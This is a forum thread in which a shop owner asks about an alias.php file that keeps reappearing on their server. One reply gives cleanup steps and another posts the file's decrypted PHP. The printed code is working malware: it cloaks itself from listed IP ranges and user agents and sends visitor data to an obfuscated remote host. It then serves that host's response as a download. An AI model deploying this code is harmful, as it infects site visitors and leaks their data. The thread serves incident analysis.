alias.php

[jey]

In everyday in our server added alias.php file even if i removed that files.

we suspect this is spam files.. Please let me know which file this is?

Password to open ZIP is:

Code: [Auswählen]

gm>yGI/*X!QH/4

Linkback: https://www.modified-shop.org/forum/index.php?topic=35500.0

[fishnet]

without having looked at your files, if you've been hacked or if a virus uploaded from your our your customers's computer, you'll have to
backup the shop for later research (for example on a linux system)
clean every single shop file and the database (if you don't have a backup without malware)
clean all computers that had access (by the way don't forget SD cards and usb sticks)
change database password
change ftp password
if paypal used: change pay api password
check if data for credit cards or banktransfer is still correct
change admin passwords in shop
best practice: change router and wifi password

should be it (did i forget something ?)

[h-h-h]

now its readable:

Code: PHP  [Auswählen]

<?php
#hs
exit;
#hs - decrypted:
error_reporting(0);
ini_set('display_errors', 0);

$cuc_ip_parts = Array(
    '103.251.107/98',
    '125.63.68.',
    '132.66.110-',
    '142.540-03-',
    '1874-64-030-',
    '192.168.10/.;87',
    '192.200.22.',
    '195.1430-3-',
    '195.238.96.',
    '196.40.310-',
    '198.102.70/-',
    '198.1434-5-',
    '199.2434-44-',
    '202.1.1610-',
    '202.95.21/1-',
    '205.164.20/-',
    '206.2435-0/6:87',
    '2076-108-0/3=87',
    '
    208.118.255.9',
    '208.80.192.',
    '208.83.136.',
    '209.1032-11398',
    '209.66.70.',
    '211.2438-3/.8',
    '216.139.0.',
    '216.187.93.',
    '216.194.108598',
    '216.47.64.',
    '24.172.72.',
    '24.2243-016-',
    '24.225.8.',
    '63.2540-064-',
    '64.140.2112-',
    '64.235.150/-',
    '64.235.153.',
    '64.38.116.',
    '64.658-55-',
    '65.39.140.',
    '66.172.47.',
    '66.249.65.',
    '66.25432,76,',
    '66.37.68.',
    '69.10.134.',
    '70.42.1310-',
    '72.2.95.',
    '74.116.210/68',
    '74.217.90.',
    '74.94.238.',
    '75.185.193.',
    '787-000-6-',
    '80.248.210/58',
    '82.80.230.',
    '85.112.1.',
    '98/-034-10/.>7',
    '981-37-005-',
    '981-37-010.,',
    '983-025-025-',
    '983-110-10/.?7',
    '10.9.71.',
    '109.2032-0/0<87',
    '200.75.0.',
    '201.238.246.9',
    '204.27.195.',
    '206.126.99.',
    '208.122.95.',
    '216.234.101398',
    '41.223.210/68',
    '64.235.154.',
    '
    687-07/-10068',
    '87.243.128.',
    '212.71.1.',
    '64.34.1110-',
    '149.255.60/-',
    '1873-0621,0/;87',
    '1873-0621,00@87',
    '1873-0621,00A87',
    '192.171.233.9',
    '213.254.241.9',
    '387-0//-10/.7',
    '4.768-012-',
    '190.112.108498',
    '980-105-0/6-',
    '70.39.157.',
    '211.110.107098',
    '208.80.194.',
    '121.42.0.',
    '64.74.215.'
);

$header_array = Array(
    "Mozilla/5.0 (X11; Linux x875^5329|ptD=6,.,/'|Ecauy-0./.././.)Orobclu,0/468758yGRN*.357'",
    "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.90:}Sqhcdms.9>,.'",
    "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.90:}Sqhcdms.9>,.'"
);

$rip = getRemoteIP();

if (in_array($_SERVER['HTTP_USER_AGENT'], $header_array)) {
    someShit();
}
if (empty($rip)) {
    someShit();
}
if (in_array(substr($rip, intval(0), strrpos($rip, '.') + intval(1)), $cuc_ip_parts)) {
    someShit();
}


$rnum = 29171; $i = 0;
foreach (str_split($_SERVER['REQUEST_URI']) as $value) {
    $rnum += ord($value);
    $i++;
}
$rnum <<= 2;
$rnum ^= $rnum;
$rnum += 32;

$rnum = str_repeat(chr($rnum), 8);


$rip  = '89.52.78.12';

$query = Array();
$query['i'] = getRemoteIP();
$query['p'] = @$_SERVER['HTTP_HOST'] . @$_SERVER['REQUEST_URI'];
$query['u'] = @$_SERVER['HTTP_USER_AGENT'];
$query['a'] = @$_SERVER['HTTP_ACCEPT_LANGUAGE'];
$query['r'] = @$_SERVER['HTTP_REFERER'];

$ext_content = stream_context_create(Array(
    'http' => Array(
        'method' => 'POST',
        'header' => 'Content-type: application/x-www-form-urlencoded',
        'content' => http_build_query($query)
    )
));


$ext_url = 'http://' . long2ip(-41 ^ (ord($rnum[0]) + ord($rnum[1]) + 1496600076)) . ':80' . '/nbgvecy5/45by4rfh.php';

$ext_content = @file_get_contents($ext_url, FALSE, $ext_content);
if (strlen($ext_content) < 10) {
    someShit();
}


$ext_content = explode("\n", $ext_content);

$ext_filename = array_shift($ext_content);
$ext_content    = implode("\n", $ext_content);

if (strstr($ext_filename, '.html') === FALSE) {
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename=' . $ext_filename);
    header('Content-Length: ' . strlen($ext_content));
}
exit($ext_content);


function getRemoteIP() {
    if (array_key_exists(REMOTE_ADDR, $_SERVER) === TRUE) {
        foreach (explode(',', $_SERVER['REMOTE_ADDR']) as $remote_ip) {
            $remote_ip = trim($remote_ip);
            if (filter_var($remote_ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== FALSE) {
                return $remote_ip;
            }
        }
    }    
    return '';
}

function someShit() {
   
    header('HTTP/1.1 404 Not Found');
   
    $called_filename = basename($_SERVER['PHP_SELF']);

    if (!file_exists('404.' . $called_filename)) {
        $random_md5 = md5(uniqid());
        $ext_content = @file_get_contents('http://' . $_SERVER['HTTP_HOST'] . '/' . $random_md5, FALSE, stream_context_create(array(
            'http' => array(
                'ignore_errors' => true
            )
        )));
        $ext_content   = str_replace($random_md5, $called_filename, $ext_content);
       
        file_put_contents('404.' . $called_filename, $ext_content);
    } else {
        $ext_content = @file_get_contents('404.' . $called_filename);
    }
   
    exit($ext_content);
}

[jey]

Can you please explain what file this is?